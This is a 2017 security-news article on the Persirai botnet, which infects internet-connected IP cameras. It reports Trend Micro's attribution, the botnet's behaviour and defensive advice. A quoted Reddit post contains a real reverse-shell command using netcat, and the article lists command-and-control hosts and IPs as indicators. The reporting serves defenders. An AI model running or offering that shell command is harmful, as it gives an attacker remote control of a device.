• Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
MUST READ

Pro-Ukraine hacktivists claim cyberattack on Russian Airline Aeroflot that caused the cancellation of +100 flights

 | 

Seychelles Commercial Bank Reported Cybersecurity Incident

 | 

Microsoft uncovers macOS flaw allowing bypass TCC protections and exposing sensitive data

 | 

U.S. CISA adds Cisco ISE and PaperCut NG/MF flaws to its Known Exploited Vulnerabilities catalog

 | 

Critical WordPress Post SMTP plugin flaw exposes 200K+ sites to full takeover

 | 

Scattered Spider targets VMware ESXi in using social engineering

 | 

China-linked group Fire Ant exploits VMware and F5 flaws since early 2025

 | 

Allianz Life data breach exposed the data of most of its 1.4M customers

 | 

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 55

 | 

Security Affairs newsletter Round 534 by Pierluigi Paganini – INTERNATIONAL EDITION

 | 

Law enforcement operations seized BlackSuit ransomware gang’s darknet sites

 | 

Arizona woman sentenced for aiding North Korea in U.S. IT job fraud scheme

 | 

Operation CargoTalon targets Russia’s aerospace with EAGLET malware,

 | 

Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access

 | 

Koske, a new AI-Generated Linux malware appears in the threat landscape

 | 

Mitel patches critical MiVoice MX-ONE Auth bypass flaw

 | 

Coyote malware is first-ever malware abusing Windows UI Automation

 | 

SonicWall fixed critical flaw in SMA 100 devices exploited in Overstep malware attacks

 | 

DSPM & AI Are Booming: $17.87B and $4.8T Markets by 2033

 | 

Stealth backdoor found in WordPress mu-Plugins folder

 | 
  • Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
  • Home
  • Breaking News
  • Internet of Things
  • Malware
  • New IOT Attack Linked To Iran – Persirai Malware Strikes at IP Cameras in Latest IOT Attack

New IOT Attack Linked To Iran – Persirai Malware Strikes at IP Cameras in Latest IOT Attack

Pierluigi Paganini May 12, 2017

Trend Micro has discovered a new attack on internet-based IP cameras and recorders powered by a new Internet of Things (IOT) bot dubbed PERSIRAI.

Trend Micro has discovered a new attack on internet-based IP cameras and recorders.  The new Internet of Things (IOT) attack called ELF_PERSIRAI has also been back-tracked to an Iranian research institute which restricts its use to Iranians only, indicating a possible state sponsored cyber strike by Tehran.

“C&C (Command and Control) servers we discovered were found to be using the .IR country code. This specific country code is managed by an Iranian research institute which restricts it to Iranians only. We also found some special Persian characters which the malware author used,” stated Trend Micro in its discovery release posted online.

IP Camera users have also encounter the malware attack and noted its point of origin appears to be Iran.

“Hello found the following text on my 2 ip cameras (nc load.gtpnet.ir 1234 -e /bin/sh) and wondering who does that domain belong to? All I know is it is an iranian address nothing on whois. Ive obviously been hacked one of these cameras was in the kids room,” stated one user in the Reddit hacking forum.

The attack is based on the previously successful Mirai IOT strike against IP cameras that was used to disrupt the Internet with a giant Denial of Service (DOS) attack in 2016.  However, while over 120,000 IP camera systems appear to be infected, over 30% of the Persirai targets are inside China with only small fraction located outside of the PRC; in Italy (3%), the UK (3%) and the USA (8%).

The Persirai attack is disturbing on a number of fronts.  Its base on the open-source Mirai strike shows that the freely available source code will be modified by attackers to strike again in different forms.  Persirai is also very stealthy, leaving most camera owners unaware that their systems are infected.

Yet, the worst feature is that the command and control computers used to run the malicious bot-net are using the country code of IR or Iran.  Infected IP cameras report to command servers at:

  • load.gtpnet.ir
  • ntp.gtpnet.ir
  • 185.62.189.232
  • 95.85.38.103

The Persirai attack installs itself and then deletes the installation files to hide its presence on the target camera, running in memory only.  It then proceeds to download and install additional control software and blocking software.  Once communications are established with the command and control network server, the infected camera is then ordered to search for other cameras and infect them as well.

persirai

Persirai blocks other zero-day exploits from gaining access to a targeted IP Camera by pointing ftpupdate.sh and ftpupload.sh to /dev/null, preventing other attacks.  This feature may be an effort to prevent duplicate attacks by Persirai as much as to prevent other bot-net attackers from gaining control of the now captured IP Camera. The fact that Persirai is running in memory does mean it is also eliminated once the IP Camera is rebooted but, unless the user takes counter-measures, the targeted system will still be vulnerable to the exploit.

While Trend Micro advises IP Camera users to use strong passwords, the Persirai attack is not dependent on a password attack, nor does it appear to steal passwords.  A better counter-measure is to disable Universal Plug and Play (UPnP) features on your router.  Universal Plug and Play (UPnP) is a network protocol that allows devices such as IP Cameras to open a port on the router and act like a server.  This feature also makes the attached devices highly visible targets for the Persirai malware attack.

Users can also simply remove their IP Camera systems from Internet access altogether and then set up a private VPN service to allow them to log into the cameras by remote.  Users are also advised to update their firmware on their IP Cameras and maintain a close inspection of any web address linked activity.

The Persirai attack is part of a new trend to strike at the Internet via devices not traditionally viewed as computers.  These malware strikes illustrate the issue of vendors selling hardware with little or no security.  There are no current regulations or standards for IOT device security.  Consumers are literally left on their own and frequently choose low cost systems which have no security features such as encryption or even manufacturer updates.

While many IOT users are aware enough to update their computers and cell phones with the latest software and perform anti-virus checks, they are not aware that other devices such as cameras, washing machines, refrigerators and DVR recorders may also require security checks.  Even DVD players and smart TVs from major manufacturers are vulnerable to exploits as illustrated by the Wikileaks release of the WEEPING ANGEL attacks developed by the CIA in co-operation with the UK’s GCHQ spy agency which attacked Samsung TVs.

Details from Trend Micro on Persirai:

http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/

About the author: Charles R. Smith is CEO of Softwar Inc. a US based information warfare company and a former national security journalist.

 

 

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – Persirai botnet, IoT)

[adrotate banner=”13″]


facebook linkedin twitter

botnet ELF_PERSIRAI Hacking IoT ThingBot

you might also like

Pierluigi Paganini July 29, 2025
Pro-Ukraine hacktivists claim cyberattack on Russian Airline Aeroflot that caused the cancellation of +100 flights
Read more
Pierluigi Paganini July 29, 2025
Seychelles Commercial Bank Reported Cybersecurity Incident
Read more

leave a comment

newsletter

Subscribe to my email list and stay
up-to-date!

    recent articles

    Pro-Ukraine hacktivists claim cyberattack on Russian Airline Aeroflot that caused the cancellation of +100 flights

    Hacktivism / July 29, 2025

    Seychelles Commercial Bank Reported Cybersecurity Incident

    Data Breach / July 29, 2025

    Microsoft uncovers macOS flaw allowing bypass TCC protections and exposing sensitive data

    Hacking / July 29, 2025

    U.S. CISA adds Cisco ISE and PaperCut NG/MF flaws to its Known Exploited Vulnerabilities catalog

    Security / July 28, 2025

    Critical WordPress Post SMTP plugin flaw exposes 200K+ sites to full takeover

    Security / July 28, 2025

    To contact me write an email to:

    Pierluigi Paganini :
    pierluigi.paganini@securityaffairs.co

    LEARN MORE

    QUICK LINKS

    • Home
    • Cyber Crime
    • Cyber warfare
    • APT
    • Data Breach
    • Deep Web
    • Digital ID
    • Hacking
    • Hacktivism
    • Intelligence
    • Internet of Things
    • Laws and regulations
    • Malware
    • Mobile
    • Reports
    • Security
    • Social Networks
    • Terrorism
    • ICS-SCADA
    • POLICIES
    • Contact me

    Copyright@securityaffairs 2024

    We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept All”, you consent to the use of ALL the cookies. However, you may visit "Cookie Settings" to provide a controlled consent.
    Cookie SettingsAccept All
    Manage consent

    Privacy Overview

    This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities...
    Necessary
    Always Enabled
    Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
    Non-necessary
    Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
    SAVE & ACCEPT